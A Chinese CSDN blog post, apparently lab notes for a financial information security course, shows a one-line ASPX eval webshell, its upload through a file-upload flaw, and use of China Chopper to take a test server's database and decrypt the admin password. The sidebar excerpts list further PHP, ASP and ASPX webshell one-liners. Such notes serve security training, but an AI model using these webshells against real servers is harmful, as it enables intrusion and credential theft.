金融信息安全实训2

已于 2022-04-20 08:47:25 修改
阅读量82 收藏
点赞数
分类专栏: 金融信息安全实训
于 2022-04-19 20:32:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53233211/article/details/124282512
版权

ASPX后门 文件上传漏洞 中国菜刀 服务器权限 数据库解密
关键词由CSDN通过智能技术生成

上传后门程序

一句话程序的使用

1、新建文本文档chengxu.txt,将文件后缀修改为aspx,书写内容如下:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

  • 例如友情链接是个上传点

3、上传之前创建的aspx一句话程序文件。

  • 将写的chengxu.aspx上传
    在这里插入图片描述

4、设法获得上传文件在网站目录中的文件名称和路径。

  • 右击上传的文件,即可得到它的文件名称和路径
http://192.168.167.92/uploadfiles/22041811075863.aspx

5、利用中国菜刀工具连接一句话程序(密码为pass)。
在这里插入图片描述

6、获得目标服务器的操作权限并拿到数据库文件。
在这里插入图片描述

7、对数据库中的账号密码进行解密。
在这里插入图片描述
即可得到解密后的密码,密码为admin。

m0_53233211
关注
专栏目录
Web安全:一句话木马
cldimd的博客
09-11 4908
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']) ?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括
金融信息安全实训——05.05
dwedewdwe的博客
05-07 141
金融信息安全实训——05.06 a.m 金融信息安全实训——05.06 p.m
文件上传漏洞
realmels的博客
07-02 1952
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend 介绍 文件上传漏洞指用户将恶意代码文.
【web安全深度剖析】笔记——上传漏洞
ZhShy
01-16 311
IIS6.0解析漏洞 当文件夹名命名为XX.asa或XX.asp时,文件夹中的所有文件都会被当做asp文件来执行 当文件命名为*.asp;1.jpg时,此文件会被当做asp文件来执行 WebDav漏洞:开启webdav后,可扩展move、copy、delete等HTTP方法,此时即可put一个a.txt写入一句话木马,并通过copy或move改名为xx.asp,这样即可轻松上传一个webshel...
文件上传漏洞(一句话木马)-学习笔记
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
金融信息安全实训--Web漏洞利用
jyr2014的博客
06-11 121
1、安装phpstudy,安装完成后启动phpStudy主界面,当看到 Apache 和 MySQL 文字后面红色的圆点变成绿色时,表示服务启动成功。如下图所示:2、将DWVA压缩包解压到phpStudy的WWW文件夹中。如下图所示:3、配置DVWA链接数据库,打开config文件夹,打开config.inc.php,需要把db_password 修改成root,保存(因为前面刚安装好的集成环境默认的MYSQL用户名和密码为root root)。如下图所示:4、访问...
金融信息安全实训——05.04
dwedewdwe的博客
05-07 297
金融信息安全实训——05.04 a.m 3-1古典密码学 1.密文“yvccfnficu”解密结果:helloworld 2.用栅栏密码程序恢复密文“hloodelwr”:helloworld 3.解密“由人俱乙口一中”和“大中口由人由工”,两段密文解密结果相同:5201314 4.与佛论禅解密佛经 ...
金融信息安全实训——Web安全加固
qq_50726412的博客
05-12 142
实训6 Web安全加固 实训目的 了解SQL注入的概念和基本原理。 了解XSS跨站的概念和基本原理。 了解上传漏洞的概念和基本原理。 掌握避免SQL注入攻击的基本方法。 掌握避免XSS跨站进行攻击的基本方法。 掌握避免上传漏洞进行攻击的基本方法。 实训准备及注意事项 1.硬件:装有Windows操作系统的计算机1台。 2.软件:myeclipse、sqlserver、blog项目。 3.严格按照实验步骤进行实验,实验结果以截图的形式进行保留。 实训任务1 SQL注入防范 1、部署并运行Blog项目,在用户
金融信息安全实训--DVWA、跨站攻击
qq_53031736的博客
05-25 224
DVWA、跨站攻击
记一次sql注入艰难上传马过程
weixin_46079186的博客
01-26 4998
先说一下我的思路,得到一个sql注入点,sqlmap 进行os-shell ,然后想上传webshell,首先进行cs 上线,发现无法上线cs,原因是目标系统windwos 2003 没有powershell,换一个思路,先找到web路径,然后上传webshell。找到web路径之后,发现路径带中文,os-shell写入webshell 的时候就会提示没有这个路径,然后进行一个手注发现上传成功 发现注入点,使用sqlmap进行os-shell 尝试上线cs,为了更好的后续操作(失败) 执行powersh
一句话木马:ASPX篇
09-21 1005
aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAu...
UEditor 任意文件上传漏洞
热门推荐
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
webshell一句话木马大全
努力是为了让自己更加有方向
04-04 1686
转载:来自WebShell’S Blog,地址:https://www.webshell.cc/2265.html 比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request(“sb”)%> 程序代码 <%execute request(“sb”)%> 程序代码 <%execute(request(“sb”))%> 程序代码 <%execute request(“sb”)%><%’<%
一句话木马
w1031308820的博客
12-01 902
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 中文名 一句话木马 外文名 特    点 隐蔽性非常好 解决方法 用"eval"替换掉"execute"服务端  目录 1 举例说明 2 写法 3 客户端 4 使用方法 5 木马原理 6 关于错误
解决ruoyi-vue-pro-master框架引入报错,启动报错问题
最新发布
xnian_的博客
09-13 432
以yudao-ui-admin-vue3-master为例,第一次先安装node_modules执行npm -i,然后npm run dev启动项目。如:后端接口:localhost:48080/admin-api/product/brand/page。3.后台启动后,模块启用yudao-server下的pom.xml文件将需要的模块注释去掉。1.以yudao-module-mall模块为例,maven报错情况。2.yudao下面的pom.xml 下引入的modules放开。
后端开发刷题 | 最长上升子序列
jingling555的博客
09-13 709
给定一个长度为 n 的数组 arr,求它的最长严格上升子序列的长度。所谓子序列,指一个数组删掉一些数(也可以不删)之后,形成的新数组。例如 [1,5,3,7,3] 数组,其子序列有:[1,3,3]、[7] 等。但 [1,6]、[1,3,5] 则不是它的子序列。我们定义一个序列是的,当且仅当该序列两个下标 i 和 j 满足 i
零基础5分钟上手亚马逊云科技-利用API网关管理API
m0_66628975的博客
09-12 1568
亚马逊云科技API网关(Amazon API Gateway)是一种完全托管的云原生服务,允许开发者轻松创建、发布、维护、监控和保护API。它可以帮助开发者将后端服务(如AWS Lambda、Amazon EC2等)与客户端(如网页、移动应用)进行安全、可靠的连接。
金融学科VR实训室:虚拟仿真教学平台设计与实施
第六章关注信息安全体系的建设,强调了在虚拟实训环境中保障数据安全的重要性,提出了相应的解决方案。 第七章则是施工组织设计,包括确保工程按期完成的技术措施、安全生产的保障措施,以及施工总平面布置的规划,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值